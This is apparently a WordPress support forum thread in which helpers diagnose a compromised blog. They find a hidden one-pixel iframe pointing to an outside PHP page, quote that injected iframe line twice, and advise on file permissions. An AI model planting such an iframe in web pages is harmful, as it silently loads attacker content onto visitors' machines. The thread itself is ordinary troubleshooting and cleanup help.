you look at the files ..
your site isnt even cached in google, so i cant even look at the cached site, and you just said its in maintenence mode.
what else can you do?
http://web.archive.org/web/20070517185830/http://www.onlzoberurff.info/
you have a script running that picking up ips and operating systems. depending on what sort of javascript is being used, that may very well be what’s causing it.
nobody really needs to know that anyway, do they? I already know what my ip and os is — i dont need you tell me.
Thread Starter
Wukung
(@wukung)
I saw the entry on google.com, thanks. In english. Had I not, I wouldnt have been able to tell you that google isnt caching your site.
SOMETHING on your site is contacting or attempting to contact localhost — which for your readers is THEIR box. I brought up your site from a shell using lynx and saw it quite clearly.
near the bottom:
<iframe src="http://www.nanoy.org/se.php?id=191" width=1 height=1></iframe>
theres your problem. actually, thats not the problem, but its your symptom.
your site has been compromised. check your permissions:
directories: 755
files: 644
leaving wp-content and the theme directories open for editing is a security risk.
Thread Starter
Wukung
(@wukung)
Now I have changed the only one file I know where “Localhost” is a matter. I deleted define(‘ENABLE_CACHE’, true); from the wp-config.php. Have you an idea what that SOMETHING could be?
Thank you!!
my last reply was caught by the forum as spam –
near the bottom:
<iframe src="http://www.nanoy.org/se.php?id=191" width=1 height=1></iframe>
theres your problem. actually, thats not the problem, but its your symptom.
your site has been compromised. check your permissions:
directories: 755
files: 644
leaving wp-content and the theme directories open for editing is a security risk.
Thread Starter
Wukung
(@wukung)
It seems the plugin SHARE THIS was the foul source. Could you please be so kind and check with your shell? THANKS
see Whooami’s last 2 replies (they were caught in moderation, I just released them)
i looked – it might have been inside that plugin .. dunno I really doubt that alex king is letting people download plugins with exploits in the code. Isnt that his plugin?
I just downloaded the Share This plugin from Alex’s site and don’t see any iframe in there.
yeah i looked too, didnt see it ..in this guys page source, the iframe was immediately before the closing body tag and after the last <!-- Share This END -->
Thread Starter
Wukung
(@wukung)
I checked the permissions. But they are ok (755). Nevertheless, thank you for the idea. It seems to be settled…
You have a mystery iframe just below:
“Der Weg nach Oberurff”
and above “Links”.
Something in that map thing. I used wget to grab the source and there it is. Using linx I too saw that reference to localhost.
Thread Starter
Wukung
(@wukung)
Thank you very much. I will delete that link at once. Besides your hint I was already thinking that could be the troublemaker. THANKS!
